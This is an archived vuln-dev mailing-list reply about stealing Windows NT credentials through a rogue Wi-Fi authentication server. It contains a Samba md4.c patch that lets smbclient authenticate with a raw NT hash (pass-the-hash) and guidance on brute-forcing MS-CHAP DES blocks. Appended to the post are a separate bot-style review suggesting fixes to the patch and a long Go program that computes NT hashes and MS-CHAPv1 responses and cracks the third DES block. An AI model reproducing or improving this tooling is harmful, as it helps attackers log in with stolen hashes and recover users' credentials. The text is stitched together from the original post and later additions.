Vulnerability Development mailing list archives
Re[2]: Stealing NT passwords through WiFi?
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Thu, 20 May 2004 21:46:49 +0400
Dear Ugen,

--Thursday, May 20, 2004, 7:31:38 PM, you wrote to 3APA3A () SECURITY NNOV RU:

U> I am under impression that as an authentication server the rogue system
U> can require any version of
U> MS-CHAP it chooses. If the original system is configured to support both
U> (and XP supplicant does,
U> not even sure if there is an easy way to force v2. only) the reply will

I have no Wi-Fi to check; for a dialup connection you can (advanced settings
of the security option for the connection).

U> include LM hash. Got to test
U> that, of course.

It depends on security settings. Group policy (or local security policy) can
prevent the system from handshaking an LM response and from storing the LM hash.

It doesn't matter if you recover the cleartext password by bruteforcing the
password or you recover the password hash by cracking DES, because with the
password hash you can connect to any resource without the cleartext password.

U> I took a shortcut in description here indeed :) This is the crucial
U> point though - I haven't found
U> ready made tools to work this step, though there was mention somewhere

I patched md4.c from the Samba distribution to convert from hex instead of
hashing the password (the NT hash is actually an MD4 of the Unicode password)
if already given something like a hash (32 Unicode [0-9A-F] characters). This
small patch allows using smbclient with a hash in hex instead of a cleartext
password.

        D = 0x10325476;
+
+
+       if(n == 64){
+               int j;
+               unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
+               for(j = 0; j<16; j++){
+                       if(!strchr(hexd, in[(j<<2)]))break;
+                       if(in[(j<<2)+1])break;
+                       if(!strchr(hexd, in[(j<<2)+2]))break;
+                       if(in[(j<<2)+3])break;
+                       out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
+                       out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
+               }
+               if(j == 16) {
+                       return;
+               }
+       }
        while (n > 64) {

U> that l0phtcrack is able
U> to use MS-CHAP (no version specified) data as an input. This is where
U> I'd welcome good
U> suggestions.

Any NTLM cracking tool is OK for MS-CHAPv1. For DES bruteforcing you can use
any DES cracking tool, like john-the-ripper, with the challenge as the salt
and each 8 bytes of the response as a crypted password. The first 16 of the
resulting 21 bytes are the password hash. Approx. half a year is required to
crack 3 DES portions on a single PC (because full bruteforcing is required)
with a fast "sliced" DES implementation. The test code I wrote works too
slowly, because it used standard DES.

--
~/ZARAZA
I will not need the sting (S. Lem)
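Review bot: the `if(n == 64)` sniffing in this hunk cannot tell a supplied hash from a genuine 32-character password made only of the digits 0-9 and uppercase A-F: such a password is decoded as a hash instead of being MD4-hashed, while a hash typed in lowercase (`a`-`f` are absent from `hexd`) is silently hashed as a password. Two smaller points on the same lines: `strchr(hexd, in[(j<<2)])` called with a zero byte returns a pointer to the terminating NUL rather than NULL, so `if(!strchr(...))break;` does not reject it and the digit value computed on the `out[j] =` line becomes 16; and `hexd` is declared `unsigned char *` while `strchr` takes `const char *`, which is why the `(char *)hexd` casts are needed two lines later. Suggest having smbclient pass an explicit "argument is a hash" flag into `mdfour` instead of inferring it from `n`, declaring `const char *hexd = "0123456789ABCDEF";`, and testing `in[(j<<2)] && strchr(hexd, in[(j<<2)])` so a NUL is rejected.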
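What the reply describes, as an added example in Go that is not code from the original message, from Samba, from john-the-ripper or from l0phtcrack: the NT hash as MD4 over the UTF-16LE password (Go's standard library has no MD4, so a small one is included), the patch's behaviour of accepting 32 hex digits as the hash itself instead of a cleartext password (hex.DecodeString also accepts lowercase, which the patch's uppercase-only table does not), the MS-CHAPv1 NT response (hash zero-padded to 21 bytes, split into three 7-byte DES keys, each encrypting the 8-byte challenge, so that every 8-byte block of the 24-byte response is a DES ciphertext of the challenge, which is exactly what the reply suggests feeding a DES cracker with the challenge as the salt), and a brute force of the third block. The password "password", the challenge bytes and all function names are constructed for illustration. The example goes one step beyond the text: the third DES key holds only two hash bytes plus five zero bytes, so that block is recovered in at most 65536 trials, while each of the first two keys needs the full 56-bit search the reply estimates at about half a year on one PC.

```go
package main

import (
	"crypto/des"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"unicode/utf16"
)

// md4 is a compact MD4 (RFC 1320); Go's standard library has no MD4.
func md4(msg []byte) [16]byte {
	rot := func(x uint32, s uint) uint32 { return x<<s | x>>(32-s) }
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	m := append(append([]byte{}, msg...), 0x80) // pad: 0x80, zeros to 56 mod 64, LE bit length
	m = append(m, make([]byte, (119-len(msg)%64)%64)...)
	m = binary.LittleEndian.AppendUint64(m, uint64(len(msg))*8)
	for off := 0; off < len(m); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(m[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1: F = (b&c)|(^b&d), words 0..15 in order
			a, b, c, d = d, rot(a+((b&c)|(^b&d))+x[i], []uint{3, 7, 11, 19}[i%4]), b, c
		}
		for i := 0; i < 16; i++ { // round 2: G = majority(b,c,d), words 0,4,8,12,1,5,...
			a, b, c, d = d, rot(a+((b&c)|(b&d)|(c&d))+x[(i%4)*4+i/4]+0x5a827999, []uint{3, 5, 9, 13}[i%4]), b, c
		}
		for i := 0; i < 16; i++ { // round 3: H = b^c^d, words 0,8,4,12,2,10,...
			k := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}[i]
			a, b, c, d = d, rot(a+(b^c^d)+x[k]+0x6ed9eba1, []uint{3, 9, 11, 15}[i%4]), b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range [4]uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is MD4 over the UTF-16LE encoding of the password, as the message says.
func ntHash(password string) [16]byte {
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) {
		buf = append(buf, byte(u), byte(u>>8))
	}
	return md4(buf)
}

// ntHashOrPassword mirrors the smbclient patch: 32 hex digits are used as the NT
// hash directly (no cleartext needed); anything else is hashed as a password.
func ntHashOrPassword(arg string) (h [16]byte) {
	if raw, err := hex.DecodeString(arg); err == nil && len(raw) == 16 {
		copy(h[:], raw)
		return h
	}
	return ntHash(arg)
}

// desKey spreads 7 key bytes over 8; the low (parity) bit of each is ignored by crypto/des.
func desKey(k7 []byte) []byte {
	k := []byte{k7[0], 0, 0, 0, 0, 0, 0, k7[6] << 1}
	for i := 1; i < 7; i++ {
		k[i] = k7[i-1]<<(8-uint(i)) | k7[i]>>uint(i)
	}
	return k
}

// msChapV1Response: hash zero-padded to 21 bytes, split into three 7-byte DES keys,
// each encrypting the challenge; the three 8-byte blocks are what the message
// suggests feeding a DES cracker such as john, with the challenge as the salt.
func msChapV1Response(hash [16]byte, challenge [8]byte) (resp [24]byte) {
	var padded [21]byte
	copy(padded[:], hash[:])
	for i := 0; i < 3; i++ {
		blk, _ := des.NewCipher(desKey(padded[7*i : 7*i+7])) // 8-byte key, cannot fail
		blk.Encrypt(resp[8*i:8*i+8], challenge[:])
	}
	return resp
}

// crackThirdPortion recovers hash[14:16] from the last response block: that DES key
// is two hash bytes plus five zero bytes, so at most 65536 trials are needed.
func crackThirdPortion(challenge [8]byte, resp [24]byte) (byte, byte, bool) {
	key7, out := make([]byte, 7), make([]byte, 8)
	for i := 0; i < 1<<16; i++ {
		key7[0], key7[1] = byte(i>>8), byte(i)
		blk, _ := des.NewCipher(desKey(key7))
		blk.Encrypt(out, challenge[:])
		if string(out) == string(resp[16:]) {
			return key7[0], key7[1], true
		}
	}
	return 0, 0, false
}

func main() { // constructed sample, not a captured exchange
	challenge := [8]byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}
	hash := ntHashOrPassword("password")
	resp := msChapV1Response(hash, challenge)
	b14, b15, ok := crackThirdPortion(challenge, resp)
	fmt.Printf("hash %x\nresponse %x\nthird block cracked: %v -> %02x%02x\n", hash, resp, ok, b14, b15)
}
```

Running it prints the NT hash, the 24-byte response and the two hash bytes recovered from the third block; feeding `ntHashOrPassword` the hex string printed on the first line instead of the password produces the identical response, which is the point of the smbclient patch. Recovering the last two hash bytes this cheaply is why a cracker of MS-CHAPv1 or NTLMv1 responses only has to search the two full 56-bit DES keys.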
Current thread:
- Stealing NT passwords through WiFi? Ugen (May 19)
- Re: Stealing NT passwords through WiFi? 3APA3A (May 20)
- Re: Stealing NT passwords through WiFi? Ugen (May 20)
- Re[2]: Stealing NT passwords through WiFi? 3APA3A (May 20)
- Re: Stealing NT passwords through WiFi? Ugen (May 20)
- <Possible follow-ups>
- Re: Stealing NT passwords through WiFi? Ugen (May 20)
- Re: Stealing NT passwords through WiFi? 3APA3A (May 20)